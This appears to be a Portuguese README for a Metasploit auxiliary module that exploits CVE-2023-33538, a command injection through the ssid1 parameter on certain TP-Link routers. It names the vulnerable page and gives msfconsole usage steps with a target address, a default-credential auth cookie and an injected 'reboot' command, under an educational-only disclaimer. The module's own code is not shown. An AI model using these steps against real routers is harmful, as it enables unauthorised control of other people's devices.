
CVE-2023-33538 - Módulo Ruby de injeção de comando TP-Link para o Metasploit Framework
Este módulo auxiliar do Metasploit tem como alvo uma vulnerabilidade de injeção de comandos autenticada nos roteadores TP-Link TL-WR940N V2/V4 e TL-WR841N V8/V10.
O problema está no parâmetro vulnerável ssid1 usado em WlanNetworkRpm.htm, que permite a injeção de comandos shell arbitrários.
Quando bem-sucedido, permite que o atacante execute comandos arbitrários no dispositivo.
Mais informações sobre o CVE:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb para a sua pasta de módulos do Metasploit, por exemplo:cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
O módulo não realiza autenticação. Você deve extrair manualmente o cookie
Authorizatione o prefixo de sessão de um login bem-sucedido na interface web do roteador.
Este módulo é destinado apenas para fins educacionais.
Não use este código contra dispositivos ou infraestrutura que você não possua ou para os quais não tenha permissão explícita de teste.
Se encontrar bugs ou tiver ideias para melhorias, sinta-se à vontade para abrir uma issue ou deixar um comentário.